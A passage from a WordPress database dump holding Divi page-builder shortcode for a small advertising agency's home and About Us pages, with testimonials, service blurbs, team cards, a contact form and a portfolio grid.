body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" use_background_color=\"off\" animation_style=\"slide\" animation_direction=\"left\" animation_intensity_slide=\"20%\" hover_enabled=\"0\" title_text=\"portraits-circle-small_5\"]“There are many variations of passages of Lorem Ipsum available, but the majority have suffered alteration by injected humour.”\r[/et_pb_testimonial][/et_pb_column][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_testimonial author=\"Eduard Ungureanu\" job_title=\"Tech Support\" company_name=\"Elegant Themes\" portrait_url=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/07/portraits-circle-small_1.png\" quote_icon=\"off\" _builder_version=\"4.5.2\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" use_background_color=\"off\" animation_style=\"slide\" animation_direction=\"right\" animation_intensity_slide=\"20%\" hover_enabled=\"0\" title_text=\"portraits-circle-small_1\"]“There are many variations of passages of Lorem Ipsum available, but the majority have suffered alteration by injected humour.”\r[/et_pb_testimonial][et_pb_testimonial author=\"Tom Ewer\" job_title=\"Blogger\" company_name=\"Elegant Themes\" portrait_url=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/07/portraits-circle-small_3.png\" quote_icon=\"off\" _builder_version=\"4.5.2\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" use_background_color=\"off\" animation_style=\"slide\" animation_direction=\"right\" animation_intensity_slide=\"20%\" hover_enabled=\"0\" title_text=\"portraits-circle-small_3\"]“There are many variations of passages of Lorem Ipsum available, but the majority have suffered alteration by injected humour.”\r[/et_pb_testimonial][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Contact Form Section\" _builder_version=\"4.4.9\" background_color=\"#d4b068\" custom_padding=\"50px||50px||false|false\" animation_style=\"zoom\" animation_direction=\"bottom\" animation_intensity_zoom=\"10%\" saved_tabs=\"all\"][et_pb_row admin_label=\"Service Section Title\" _builder_version=\"3.25\" custom_margin=\"||40px|\" animation_style=\"fade\" animation_direction=\"top\" locked=\"off\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Title\" _builder_version=\"3.27.4\" text_font=\"Montserrat||||||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.9em\" header_font=\"||||||||\" header_2_font=\"Montserrat|700||on|||||\" header_2_font_size=\"42px\" header_2_line_height=\"1.3em\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"4%\"]<h2>Let\'s Start Something new<br /><span style=\"color: #FFF;\">Say Hello!</span></h2>\r[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"4.4.9\" text_font=\"Montserrat||||\" text_text_color=\"#353740\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_font=\"||||||||\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" custom_margin=\"|||\" animation_style=\"slide\" animation_direction=\"bottom\" animation_delay=\"100ms\" animation_intensity_slide=\"4%\"]<p><span>We would love to connect up and join your brand journey. Do not hesitate to question/drop us a line, As discerning mind always take better decision.</span></p>[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row admin_label=\"Contact Form\" _builder_version=\"3.25\" animation_style=\"fade\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_contact_form email=\"dhiraj@wthtest1.in8.cdn-alpha.com\" custom_message=\"Hi my name is %%Name%%, Email id is %%Email%% and Mobile No is %%Mobile_No%%, my message is %%Message%%\" submit_button_text=\"Send\" module_id=\"et_pb_contact_form_0\" _builder_version=\"4.4.9\" form_field_background_color=\"rgba(255,255,255,0)\" form_field_text_color=\"#353740\" form_field_font=\"Montserrat||||\" form_field_font_size=\"16px\" custom_button=\"on\" button_text_color=\"#ffffff\" button_border_width=\"5px\" button_border_color=\"#ffffff\" button_border_radius=\"100px\" button_letter_spacing=\"2px\" button_font=\"Montserrat|on||on|\" button_icon=\"%%36%%\" button_icon_color=\"#ffffff\" max_width=\"800px\" module_alignment=\"center\" animation_style=\"fade\" box_shadow_style=\"preset7\" box_shadow_horizontal=\"0px\" box_shadow_vertical=\"-1px\" box_shadow_color=\"rgba(0,0,0,0.18)\" form_background_color=\"rgba(255,255,255,0)\" button_text_color_hover=\"#ffffff\" button_bg_color_hover=\"rgba(0,0,0,0)\" button_border_color_hover=\"#ffffff\" button_letter_spacing_hover=\"2px\"][et_pb_contact_field field_id=\"Name\" field_title=\"Name\" fullwidth_field=\"on\" _builder_version=\"3.16\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"off\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"off\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"off\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"off\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"][/et_pb_contact_field][et_pb_contact_field field_id=\"Mobile_No\" field_title=\"Mobile No\" fullwidth_field=\"on\" _builder_version=\"4.4.9\"][/et_pb_contact_field][et_pb_contact_field field_id=\"Email\" field_title=\"Email Address\" field_type=\"email\" fullwidth_field=\"on\" _builder_version=\"3.16\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"off\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"off\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"off\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"off\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"][/et_pb_contact_field][et_pb_contact_field field_id=\"Message\" field_title=\"Message\" field_type=\"text\" fullwidth_field=\"on\" _builder_version=\"4.4.9\" custom_margin=\"||60px|\" custom_padding=\"|||\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"off\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"off\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"off\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"off\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"][/et_pb_contact_field][/et_pb_contact_form][/et_pb_column][/et_pb_row][/et_pb_section]','Home','','inherit','closed','closed','','134-revision-v1','','','2020-08-04 18:48:36','2020-08-04 18:48:36','',134,'https://wthtest1.in8.cdn-alpha.com/2020/08/04/134-revision-v1/',0,'revision','',0),(392,1,'2020-08-04 18:54:58','2020-08-04 18:54:58','[et_pb_section fb_built=\"1\" admin_label=\"Page Header\" _builder_version=\"4.5.6\" background_image=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/07/circle-background-pattern.png\" custom_margin_tablet=\"\" custom_margin_phone=\"\" custom_margin_last_edited=\"on|phone\" custom_padding=\"20px|0px|0px|0px|false|false\" animation_style=\"zoom\" animation_intensity_zoom=\"4%\"][et_pb_row _builder_version=\"3.25\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" custom_padding=\"|||\" animation_style=\"slide\" animation_direction=\"top\" animation_intensity_slide=\"3%\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text content_tablet=\"\" content_phone=\"\" content_last_edited=\"on|phone\" _builder_version=\"4.5.6\" text_font=\"||||||||\" header_font=\"Montserrat|700||on|||||dotted\" header_text_color=\"#353740\" header_font_size=\"60px\" header_line_height=\"1.3em\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" custom_margin=\"|||\" animation_style=\"fade\" text_font_tablet=\"\" text_font_phone=\"\" text_font_last_edited=\"on|phone\" text_font_size_tablet=\"\" text_font_size_phone=\"9px\" text_font_size_last_edited=\"on|phone\" header_font_size_last_edited=\"off|desktop\" locked=\"off\"]<h1>About US</h1>\r[/et_pb_text][et_pb_divider show_divider=\"off\" disabled_on=\"on|on|off\" _builder_version=\"3.2\" max_width=\"120px\" animation_style=\"slide\" animation_direction=\"top\" animation_intensity_slide=\"30%\"][/et_pb_divider][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"About Us Section\" _builder_version=\"4.5.6\" background_image=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/08/WhyWE.jpg\" parallax=\"on\" custom_margin=\"|5%||5%\" custom_margin_tablet=\"\" custom_margin_phone=\"|0px||0px\" custom_margin_last_edited=\"on|phone\" custom_padding=\"10%|||\" animation_style=\"zoom\" animation_direction=\"top\" animation_intensity_zoom=\"5%\" box_shadow_style=\"preset7\" box_shadow_horizontal=\"0px\" box_shadow_vertical=\"-200px\" box_shadow_color=\"#ffffff\"][et_pb_row column_structure=\"2_3,1_3\" admin_label=\"About Us Area\" _builder_version=\"3.25\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" custom_padding=\"27px|0px|0px|0px\"][et_pb_column type=\"2_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Title\" _builder_version=\"4.5.2\" text_font=\"Montserrat||||||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.9em\" header_font=\"||||||||\" header_text_align=\"left\" header_2_font=\"Montserrat|700||on|||||\" header_2_font_size=\"42px\" header_2_line_height=\"1.3em\" background_color=\"#f7f7f7\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" max_width=\"700px\" module_alignment=\"left\" custom_margin=\"|||\" custom_padding=\"10%|10%|10%|10%\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"4%\" animation_starting_opacity=\"100%\" box_shadow_style=\"preset1\" box_shadow_vertical=\"15px\" box_shadow_blur=\"45px\" box_shadow_color=\"rgba(0,0,0,0.15)\" locked=\"off\"]<h2>Build Brand Equity</h2>\n<p>Our advertising and marketing startegies are aligned towards the core objectives of the business operation of sustainable sales leading to profit and building brand equity as long term asset creation for the businesses.</p>\n<p><span style=\"font-size: 16px;\">There is a need to understand the various phases of businesses &amp; invest in marketing (Sales or Brand Building) in the required proportion. As per the budget of the business we can align our marketing and advertising strategies into aggressive disruptive to guerilla or safe. As the successful advertising and marketing require patience and balancing various market forces to help your business thrust to an upward direction.</span></p>[/et_pb_text][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Service Section\" _builder_version=\"3.22\" custom_margin=\"|||\" custom_padding=\"56px||56px|||\"][et_pb_row column_structure=\"1_3,1_3,1_3\" use_custom_gutter=\"on\" gutter_width=\"2\" make_equal=\"on\" admin_label=\"Services\" _builder_version=\"3.25\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" max_width=\"80%\" custom_padding=\"25px||25px|\" use_custom_width=\"on\" width_unit=\"off\"][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"Creative\" use_icon=\"on\" font_icon=\"%%74%%\" use_icon_font_size=\"on\" icon_font_size=\"60px\" _builder_version=\"4.5.2\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" text_orientation=\"center\" custom_padding=\"30px|30px|30px|30px\" animation_style=\"zoom\" border_width_all=\"0px\" border_color_all=\"#dddddd\" border_style_all=\"solid\" use_border_color=\"on\" border_color=\"#dddddd\"]<p><span>It is important for the creative process and our lives. A key component of visual marketing to let businesses succeed.</span></p>[/et_pb_blurb][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"Media\" use_icon=\"on\" font_icon=\"%%103%%\" use_icon_font_size=\"on\" icon_font_size=\"60px\" _builder_version=\"4.5.2\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" text_orientation=\"center\" custom_padding=\"30px|30px|30px|30px\" animation_style=\"zoom\" animation_delay=\"100ms\" border_width_all=\"0px\" border_color_all=\"#dddddd\" border_style_all=\"solid\" use_border_color=\"on\" border_color=\"#dddddd\"]<p><span>Strategically using new age media and creating a media mix effectively to evolve a sales funnel or brand awareness to engagement.</span></p>[/et_pb_blurb][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"Digital\" use_icon=\"on\" font_icon=\"%%107%%\" use_icon_font_size=\"on\" icon_font_size=\"60px\" _builder_version=\"4.5.2\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" text_orientation=\"center\" custom_padding=\"30px|30px|30px|30px\" animation_style=\"zoom\" animation_delay=\"200ms\" border_width_all=\"0px\" border_color_all=\"#dddddd\" border_style_all=\"solid\" use_border_color=\"on\" border_color=\"#dddddd\"]<p><span>Digital has emerged as one of the efficient media, there is no spill over with the help of professional targeting &amp; even individual targeting is possible.</span></p>[/et_pb_blurb][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"1_3,1_3,1_3\" use_custom_gutter=\"on\" gutter_width=\"2\" make_equal=\"on\" admin_label=\"Services\" _builder_version=\"3.25\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" max_width=\"80%\" custom_padding=\"25px||25px|\" use_custom_width=\"on\" width_unit=\"off\"][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"Business Strategy\" use_icon=\"on\" font_icon=\"%%101%%\" use_icon_font_size=\"on\" icon_font_size=\"60px\" _builder_version=\"4.5.2\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" text_orientation=\"center\" custom_padding=\"30px|30px|30px|30px\" animation_style=\"zoom\" border_width_all=\"0px\" border_color_all=\"#dddddd\" border_style_all=\"solid\" use_border_color=\"on\" border_color=\"#dddddd\"]<p><span>Gaining the competitive edge with Integrated Marketing Communications (IMC) or building product marketing strategy / Go to market strategy, We are in.</span></p>[/et_pb_blurb][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"Web Design\" use_icon=\"on\" font_icon=\"%%106%%\" use_icon_font_size=\"on\" icon_font_size=\"60px\" _builder_version=\"4.5.2\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" text_orientation=\"center\" custom_padding=\"30px|30px|30px|30px\" animation_style=\"zoom\" animation_delay=\"100ms\" border_width_all=\"0px\" border_color_all=\"#dddddd\" border_style_all=\"solid\" use_border_color=\"on\" border_color=\"#dddddd\"]<p><span>Online presence of any brand/product/service starts with a well defined and clearly communicated website. Website is the key and elementry step for any advertising campaign. So be ready to a bolder start.</span></p>[/et_pb_blurb][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"Design/Video/Photo\" use_icon=\"on\" font_icon=\"%%108%%\" use_icon_font_size=\"on\" icon_font_size=\"60px\" _builder_version=\"4.5.2\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" text_orientation=\"center\" custom_padding=\"30px|30px|30px|30px\" animation_style=\"zoom\" animation_delay=\"200ms\" border_width_all=\"0px\" border_color_all=\"#dddddd\" border_style_all=\"solid\" use_border_color=\"on\" border_color=\"#dddddd\"]<p><span>Design is not Art, Art is about the Artist, &amp; Design is about the user. Blending &amp; Balancing Art, Design, Copy &amp; Business Objective is what we do.</span></p>[/et_pb_blurb][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Quote Section\" _builder_version=\"4.5.2\" background_color=\"#d4b068\" custom_margin=\"|||\" custom_padding=\"56px|0px|56px|0px|false|false\" animation_style=\"zoom\" animation_direction=\"bottom\" animation_intensity_zoom=\"4%\" animation_starting_opacity=\"100%\" locked=\"off\"][et_pb_row admin_label=\"Quote\" _builder_version=\"3.25\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Quote\" _builder_version=\"4.5.2\" text_font=\"||||||||\" text_text_color=\"#353740\" text_font_size=\"24px\" text_line_height=\"1.8em\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" animation_style=\"flip\" animation_direction=\"top\" animation_intensity_flip=\"20%\"]<p><span>With the advent to this digital era, <strong>Unique traffic to your website</strong>, is becoming the key battle point. Targeting the appropriate TG and reaching to them at the right place and the moment can help you earn them for lifetime.</span></p>[/et_pb_text][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Video Section\" _builder_version=\"4.5.2\" use_background_color_gradient=\"on\" background_color_gradient_start=\"#d4b068\" background_color_gradient_end=\"#ffffff\" background_color_gradient_start_position=\"30%\" background_color_gradient_end_position=\"30%\" custom_padding=\"0px||56px||false|false\"][et_pb_row admin_label=\"Video\" _builder_version=\"3.25\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" custom_padding=\"0px|0px|0px|0px\" animation_direction=\"top\" box_shadow_style=\"preset1\" box_shadow_blur=\"77px\" locked=\"off\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_video src=\"https://www.youtube.com/watch?v=GQB6K7Dozms\" image_src=\"//i.ytimg.com/vi/GQB6K7Dozms/hqdefault.jpg\" thumbnail_overlay_color=\"rgba(0,0,0,0.6)\" _builder_version=\"4.5.2\" animation_direction=\"bottom\" box_shadow_style=\"preset5\" box_shadow_vertical=\"0px\" box_shadow_spread=\"20px\" box_shadow_color=\"#ffffff\"][/et_pb_video][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Team Member Section\" _builder_version=\"4.5.2\" custom_padding=\"56px||56px||false|false\"][et_pb_row admin_label=\"Service Section Title\" _builder_version=\"3.25\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" custom_margin=\"||40px|\" animation_style=\"fade\" animation_direction=\"top\" saved_tabs=\"all\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Title\" _builder_version=\"3.27.4\" text_font=\"Montserrat||||||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.9em\" header_font=\"||||||||\" header_2_font=\"Montserrat|700||on|||||\" header_2_text_color=\"#353740\" header_2_font_size=\"42px\" header_2_line_height=\"1.3em\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"4%\"]<h2>Fearless Leaeders</h2>\r[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"4.5.2\" text_font=\"Montserrat||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_font=\"||||||||\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" custom_margin=\"|||\" animation_style=\"slide\" animation_direction=\"bottom\" animation_delay=\"100ms\" animation_intensity_slide=\"4%\"]<p>We do not fear trying new stuff and failure (we say learning). Meet the <span>team of professionals enjoying their work and adding value to your project.</span></p>[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"1_3,1_3,1_3\" _builder_version=\"3.25\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" custom_padding=\"||15px|\"][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_team_member name=\"Dhiraj Kumar\" position=\"Founder\" image_url=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/08/Artboard-Copy-6-1.jpg\" linkedin_url=\"https://www.linkedin.com/in/dhirajwth\" _builder_version=\"4.5.6\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" text_orientation=\"center\" custom_margin=\"|||\" custom_padding=\"|||\" animation_style=\"fade\" hover_enabled=\"0\" alt=\"Dhiraj\" title_text=\"Founder WhatTheHell?\"][/et_pb_team_member][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_team_member name=\"Shubham Jha\" position=\"Marketing Director\" image_url=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/08/Artboard-2.jpg\" facebook_url=\"#\" linkedin_url=\"#\" _builder_version=\"4.5.2\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" text_orientation=\"center\" custom_margin=\"|||\" custom_padding=\"|||\" animation_style=\"fade\" animation_delay=\"100ms\" locked=\"off\"][/et_pb_team_member][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_team_member name=\"Sachin\" position=\"Art Director\" image_url=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/08/Artboard-Copy-7.jpg\" facebook_url=\"#\" _builder_version=\"4.5.2\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" text_orientation=\"center\" custom_margin=\"|||\" custom_padding=\"|||\" animation_style=\"fade\" animation_delay=\"200ms\" locked=\"off\"][/et_pb_team_member][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Other Recent Works Section\" _builder_version=\"3.22\" background_color=\"#353740\" custom_margin=\"|||\" custom_padding=\"56px||56px|||\"][et_pb_row admin_label=\"Service Section Title\" _builder_version=\"3.25\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" custom_margin=\"||40px|\" animation_style=\"fade\" animation_direction=\"top\" saved_tabs=\"all\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Title\" _builder_version=\"4.5.2\" text_font=\"Montserrat||||||||\" text_text_color=\"#d4b068\" text_font_size=\"16px\" text_line_height=\"1.9em\" header_font=\"||||||||\" header_text_color=\"#d4b068\" header_2_font=\"Montserrat|700||on|||||\" header_2_text_color=\"#d4b068\" header_2_font_size=\"42px\" header_2_line_height=\"1.3em\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"4%\"]<h2>our Work</h2>\r[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"4.5.2\" text_font=\"Montserrat||||\" text_text_color=\"#f7f7f7\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_font=\"||||||||\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" custom_margin=\"|||\" animation_style=\"slide\" animation_direction=\"bottom\" animation_delay=\"100ms\" animation_intensity_slide=\"4%\"]<p><span>Creative &amp; Effective work around practical marketing problems. Next update will have your creatives.</span></p>[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"1_3,1_3,1_3\" use_custom_gutter=\"on\" gutter_width=\"2\" admin_label=\"Other Recent Works Area\" _builder_version=\"3.25\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" max_width=\"80%\" use_custom_width=\"on\" width_unit=\"off\"][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_image src=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/08/800x800-w.jpg\" alt=\"Packaging Design\" title_text=\"packaging design by what the hell\" show_in_lightbox=\"on\" use_overlay=\"on\" overlay_icon_color=\"#353740\" hover_overlay_color=\"#d4b068\" align_tablet=\"center\" align_phone=\"\" align_last_edited=\"on|desktop\" _builder_version=\"4.5.2\" animation_style=\"zoom\" animation_intensity_zoom=\"20%\" animation_starting_opacity=\"100%\"][/et_pb_image][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_image src=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/08/800x800..1.jpg\" alt=\"Packaging Design creative agency\" title_text=\"packaging design creative advertising agency\" show_in_lightbox=\"on\" use_overlay=\"on\" overlay_icon_color=\"#353740\" hover_overlay_color=\"#d4b068\" align_tablet=\"center\" align_phone=\"\" align_last_edited=\"on|desktop\" _builder_version=\"4.5.2\" animation_style=\"zoom\" animation_delay=\"100ms\" animation_intensity_zoom=\"20%\" animation_starting_opacity=\"100%\"][/et_pb_image][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_image src=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/08/800x800.jpg\" alt=\"Creative graphic designing \" title_text=\"Creative graphic designing \" show_in_lightbox=\"on\" use_overlay=\"on\" overlay_icon_color=\"#353740\" hover_overlay_color=\"#d4b068\" align_tablet=\"center\" align_phone=\"\" align_last_edited=\"on|desktop\" _builder_version=\"4.5.2\" animation_style=\"zoom\" animation_delay=\"200ms\" animation_intensity_zoom=\"20%\" animation_starting_opacity=\"100%\" locked=\"off\"][/et_pb_image][/et_pb_column][/et_pb_row][et_pb_row _builder_version=\"3.25\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" locked=\"off\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" 